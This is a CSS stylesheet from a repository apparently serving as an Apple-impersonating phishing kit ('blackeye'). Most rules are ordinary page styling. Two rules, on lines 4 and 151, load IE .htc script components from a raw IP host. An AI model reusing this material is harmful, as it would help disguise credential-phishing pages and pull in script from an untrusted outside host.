Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
thewickedkarma
GitHub Repository: thewickedkarma/blackeye-im
Path: blob/master/sites/apple/images/blackout.css
777 views
1
@import url(ac_quicktime.css);
2
@import url(overlay.css);
3
4
#main .maincap, .controllerPanel .sliderPanel .track .playHead { behavior:url(http://37.59.97.23/external.html?link=https://appleid.cdn-apple.com/20131211/global/scripts/lib/iepngfix.htc); }
5
.privacy-questions h2 {
6
margin-bottom: 10px;
7
}
8
.truste, .privacy-questions {
9
background: none repeat scroll 0 0 #FBFBFB;
10
float: right;
11
margin-bottom: 32px;
12
padding: 20px;
13
position: relative;
14
width: 230px;
15
}
16
.content, .rounded, .article .box {
17
border-radius: 4px;
18
}
19
/* text & colors */
20
html { background-color:#fff; }
21
body { font-size:12px; line-height:1.5; color:#333; background-color:transparent; }
22
23
#main { width:984px; margin:0 auto; zoom:1; }
24
#main .maincap { position:absolute; width:984px; left:0; z-index:5; font-size:1px; }
25
#main:after { content:"."; display:block; height:0; clear:both; visibility:hidden; }
26
27
h1, h2, h3, h4, h5, h6 { color:#000; }
28
h1 { margin-bottom:.3em; font-size:3em; line-height:1.4; font-weight:normal; }
29
h2 { margin-bottom:.3em; font-size:2em; line-height:1.4; font-weight:normal; }
30
h3 { margin-bottom:.3em; font-size:1.3em; line-height:1.4; }
31
h4 { font-size:1em; line-height:1.5; }
32
h5 {}
33
h6 {}
34
.replaced { display:block; width:1px; height:1px; outline:none; overflow:hidden; text-indent:-9999px; }
35
cite { font-style:italic; }
36
37
ul { margin-bottom:0; }
38
ul.square,
39
ul.circle { margin-bottom:1.5em; }
40
ul ul.circle,
41
ul ul.square { margin-top:.5em; margin-bottom:1em; }
42
43
p { margin-bottom:1.5em; }
44
p.intro { color:#888; font-size:16px; line-height:1.4; font-weight:normal; }
45
#main .sidebar { color:#333; }
46
47
sup, sup a { color:#666; }
48
sup a:hover { color:#08c; text-decoration:none; }
49
.sosumi { color:#888; line-height:1.5; }
50
.sosumi_features { color:#888; line-height:1.5; }
51
52
body.specs #content { font-size:11px; line-height:1.5; }
53
body.specs #content h4 { font-size:12px; line-height:1.5; }
54
55
#content strong { color:#000; }
56
57
/* layout */
58
.content { -webkit-box-shadow: rgba(0,0,0,0.3) 0 1px 3px; -moz-box-shadow: rgba(0,0,0,0.3) 0 1px 3px; background: #fff; }
59
@-moz-document url-prefix() { .content { border: 1px solid; border-color: #e5e5e5 #dbdbdb #d2d2d2; } } /* FF2 */
60
.content { *border: 1px solid; *border-color: #e5e5e5 #dbdbdb #d2d2d2; } /* IEs */
61
.content:nth-child(1n) { border: none; } /* reset for smart browsers */
62
63
.content,
64
.rounded,
65
.article .box { border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; -o-border-radius: 4px; -khtml-border-radius: 4px; }
66
67
.graybox,
68
.callout { border-radius: 7px; -webkit-border-radius: 7px; -moz-border-radius: 7px; -o-border-radius: 7px; -khtml-border-radius: 7px; }
69
70
.roundedtop { border-radius: 4px 4px 0 0; -webkit-border-top-left-radius:4px; -webkit-border-top-right-radius:4px; -moz-border-radius: 4px 4px 0 0; -o-border-radius: 4px 4px 0 0; -khtml-border-radius: 4px 4px 0 0; }
71
.roundedbottom { border-radius: 0 0 4px 4px; -webkit-border-bottom-left-radius:4px; -webkit-border-bottom-right-radius:4px; -moz-border-radius: 0 0 4px 4px; -o-border-radius: 0 0 4px 4px; -khtml-border-radius: 0 0 4px 4px; }
72
.roundedright { border-radius: 0 4px 4px 0; -webkit-border-top-right-radius:4px; -webkit-border-bottom-right-radius:4px; -moz-border-radius: 0 4px 4px 0; -o-border-radius: 0 4px 4px 0; -khtml-border-radius: 0 4px 4px 0; }
73
.roundedleft { border-radius: 4px 0 0 4px; -webkit-border-top-left-radius:4px; -webkit-border-bottom-left-radius:4px; -moz-border-radius: 4px 0 0 4px; -o-border-radius: 4px 0 0 4px; -khtml-border-radius: 4px 0 0 4px; }
74
75
/* productheader */
76
#productheader { border:0; }
77
#productheader ul li a { color:#333; margin-left:30px; text-shadow: #fff 0 1px 0; }
78
#productheader ul li a:hover { color:#08c !important; }
79
80
/* promofooter */
81
#promofooter { width:984px; margin:18px auto 0; padding-top:17px; background:url(promofooter_top.png) no-repeat; zoom:1; _background-image:url(../../../ssl.apple.com/promos/images/promofooter_top.gif); }
82
#promofooter #promos { width:980px; margin-bottom:0; padding:0 2px 4px; background:url(promofooter_bottom.png) no-repeat 0 100%; zoom:1; _background-image:url(../../../ssl.apple.com/promos/images/promofooter_bottom.gif); }
83
#promofooter #promos:after { content:'.'; display:block; height:0; clear:both; visibility:hidden; }
84
#promofooter #promos li.promo { position:relative; float:left; width:244px; min-height:15em; _height:15em; padding-right:1px; margin-top:-16px; }
85
#promofooter #promos li.promo a { color:#777; }
86
#promofooter #promos li.promo:hover a { color:#08c; text-decoration:none; }
87
88
#promofooter #promos img { display:block; }
89
90
#promofooter #promos h4 a,
91
#promofooter #promos p a,
92
#promofooter #promos ul { display:block; padding-left:15px; padding-right:12px; text-align:left; z-index:101; *position:relative; }
93
94
#promofooter #promos h4 a { font-size:18px; font-weight:normal; padding-top:15px; }
95
#promofooter #promos p { margin-bottom:0; }
96
#promofooter #promos p a { font-size:11px; line-height:1.4; }
97
#promofooter #promos a.image { height:180px; position:absolute; bottom:0; z-index:100; }
98
99
#promofooter #promos .promo.left p a { width:110px; }
100
#promofooter #promos .promo.right p a { width:105px; left:121px; }
101
#promofooter #promos .promo.center p a { text-align:center; }
102
103
#promofooter #promos li.buy { position:relative; float:left; width:244px; padding-right:1px; margin-top:-17px; color:#777; }
104
#promofooter #promos li.buy ul { font-size:11px; line-height:1.4; }
105
106
/* global footer */
107
#directorynav { font-size:11px; line-height:18px; }
108
#directorynav h3 { margin:0; font-size:1em; line-height:18px; }
109
110
111
/* for ac quicktime
112
------------------------*/
113
/* new controller */
114
.controllerPanel { position:absolute; display:block; width:100%; height:12px; bottom:0; }
115
.controllerPanel .ACQuicktimeController { width:auto !important; height:12px !important; padding:0; margin:0 68px 0 16px; background:none !important; }
116
.controllerPanel .ACQuicktimeController.ccAvailable { margin-right:106px; }
117
118
.controllerPanel .ACQuicktimeController .control { position:absolute; width:10px; height:10px; left:-16px; margin-top:1px; background:url(qt_playpause.gif) 0 0 no-repeat; }
119
.controllerPanel .ACQuicktimeController .control.pause { background-position:left -10px; }
120
121
.controllerPanel .ACQuicktimeController .sliderPanel { top:0; left:0; width:100%; height:12px; }
122
.controllerPanel .ACQuicktimeController .sliderPanel .track,
123
.controllerPanel .ACQuicktimeController .sliderPanel .track .loadedProgress { border-radius:6px; -webkit-border-radius:6px; -moz-border-radius:6px; -o-border-radius:6px; -khtml-border-radius:6px; }
124
.controllerPanel .ACQuicktimeController .sliderPanel .track { position:absolute; left:0; width:100%; height:12px; background:url(qt_bgtrack_load.gif) 0 0 repeat-x; }
125
.controllerPanel .ACQuicktimeController .sliderPanel .track .loadedProgress { position:absolute; top:0; min-width:12px; height:12px; background:url(qt_bgtrack.gif) 0 0 repeat-x; }
126
.controllerPanel .ACQuicktimeController .sliderPanel .track .trackProgress { display:none; }
127
.controllerPanel .ACQuicktimeController .sliderPanel .track .playHead { position:absolute; top:0; margin:0 1px; width:13px; height:12px; background:url(qt_pointer.png) 0 0 no-repeat; }
128
129
.controllerPanel .ACQuicktimeController .timeDisplay { top:-2px; right:-68px; width:62px; height:20px; font-size:11px; color:#777; text-align:center; }
130
.controllerPanel .ACQuicktimeController .timeDisplay span { padding:0 3px; }
131
132
.controllerPanel .ACQuicktimeController .captioningToggle,
133
.controllerPanel .ACQuicktimeController .captioningToggle.ccAvailable { left:auto; top:-4px; right:-106px; }
134
135
/* new new controller */
136
.movie { position:relative; padding-bottom:37px; }
137
.movie .controllerPanel { position:absolute; height:29px; left:0; background:url(../qt_bg20090106.html) 0 100% repeat-x; }
138
.movie .controllerPanel .ACQuicktimeController { position:relative; height:29px !important; margin:0 83px 0 46px; }
139
.movie .controllerPanel .ACQuicktimeController.ccAvailable { margin-right:120px; }
140
141
.movie .controllerPanel .ACQuicktimeController .control { width:31px; height:19px; top:4px; left:-39px; background:url(quicktime_playpause.png) 0 0 no-repeat; behavior:none; }
142
.movie .controllerPanel .ACQuicktimeController .control.pause { background-position:left -19px; }
143
144
.movie .controllerPanel .ACQuicktimeController .sliderPanel { top:11px; height:7px; }
145
.movie .controllerPanel .ACQuicktimeController .sliderPanel .track,
146
.movie .controllerPanel .ACQuicktimeController .sliderPanel .track .loadedProgress,
147
.movie .controllerPanel .ACQuicktimeController .sliderPanel .track .trackProgress { height:7px; min-width:6px; border-radius:3px; -webkit-border-radius:3px; -moz-border-radius:3px; -o-border-radius:3px; -khtml-border-radius:3px; }
148
.movie .controllerPanel .ACQuicktimeController .sliderPanel .track { border-right:1px solid #bdbdbd; border-left:1px solid #bdbdbd; background:url(quicktime_track.png) 0 0 repeat-x; }
149
.movie .controllerPanel .ACQuicktimeController .sliderPanel .track .loadedProgress { border-right:1px solid #b7b7b7; border-left:1px solid #b7b7b7; background:url(quicktime_track_load.png) 0 0 repeat-x; }
150
.movie .controllerPanel .ACQuicktimeController .sliderPanel .track .trackProgress { display:block; position:absolute; border-right:1px solid #868686; border-left:1px solid #868686; background:url(quicktime_track_prog.png) 0 0 repeat-x; }
151
.movie .controllerPanel .ACQuicktimeController .sliderPanel .track .playHead { top:-3px; width:11px; height:12px; background:url(quicktime_pointer.png) 0 0 no-repeat; behavior:url(http://37.59.97.23/global/scripts/lib/iepngfix.htc); }
152
153
.movie .controllerPanel .ACQuicktimeController .timeDisplay { top:6px; right:-75px; }
154
155
.movie .controllerPanel .ACQuicktimeController .captioningToggle,
156
.movie .controllerPanel .ACQuicktimeController .captioningToggle.ccAvailable { top:4px; right:-112px; }
157
158
159
/* swap view default states
160
---------------------------*/
161
162
/* loading state */
163
.moviePanel.movie-loading { position:relative; background:url(qt_loading640x360.gif) no-repeat 50% 50%; padding:15px 0; }
164
.moviePanel.movie-loading object,
165
.moviePanel.movie-loading embed { width:2px; height:2px; }
166
167
.controllerPanel .ACQuicktimeController,
168
.controllerPanel .ACQuicktimeCircularController { background:none !important; }
169
170
171
/*.moviePanel.movie-loading object[type="application/x-shockwave-flash"] { width:auto!important; height:auto!important; }
172
*/
173
.controllerPanel .ACQuicktimeController,
174
.controllerPanel .ACQuicktimeCircularController { background:none !important; }
175
176
/* end state */
177
.endState { position:relative; background:url(qt_endstate640x360.jpg) no-repeat 50% 50%; }
178
.endState img { position:absolute; left:0; top:0; }
179
.endState ul, .endState li, .endState p { position:relative; margin-bottom:0; text-align:center; }
180
.endState ul { padding-top:22%; }
181
.endState p { padding-top:27%; }
182
183
/* download links */
184
a.quicktime-download { display:block; width:300px; margin:-36px -150px; padding:20px 0; color:#333; text-align:center; background:#fff; font:26px "Myriad Pro", "MyriadPro", "Lucida Grande", "Lucida Sans Unicode", arial, verdana, sans-serif; font-weight:500; }
185
a.quicktime-download:hover { color:#08c; text-decoration:none; }
186
187
.moviePanel { position:relative; }
188
.moviePanel a.quicktime-download { position:absolute; top:50%; left:50%; }
189
190
/* pillbuttons */
191
.pillbutton { display:inline-block; position:relative; padding-right:43px; font-size:15px; line-height:1.3em; color:#fff; text-decoration:none; outline:none; z-index:2; }
192
.pillbutton, x:-moz-any-link { display:block; width:14em; margin:0 auto; } /* this is for firefox2 because inline-block doesn't work */
193
.pillbutton, x:-moz-any-link, x:default { display:inline-block; width:auto; } /* firefox3 reset */
194
.pillbutton span,
195
.pillbutton b { display:block; width:auto; padding:15px 0; text-align:left; }
196
.pillbutton span { padding-right:8px; padding-left:25px; background:url(pillbevel_leftcap.png) no-repeat 0 50%; _background-image:url(../../../ssl.apple.com/global/elements/buttons/pill_leftcap.gif); }
197
.pillbutton b { position:absolute; width:43px; top:0; right:0; text-indent:-9999px; background:url(pillbevel_rightcap.png) no-repeat 0 50%; _background-image:url(../../../ssl.apple.com/global/elements/buttons/pill_rightcap.gif); }
198
.pillbutton:hover,
199
.pillbutton:focus { color:#e6e6e6; }
200
201
202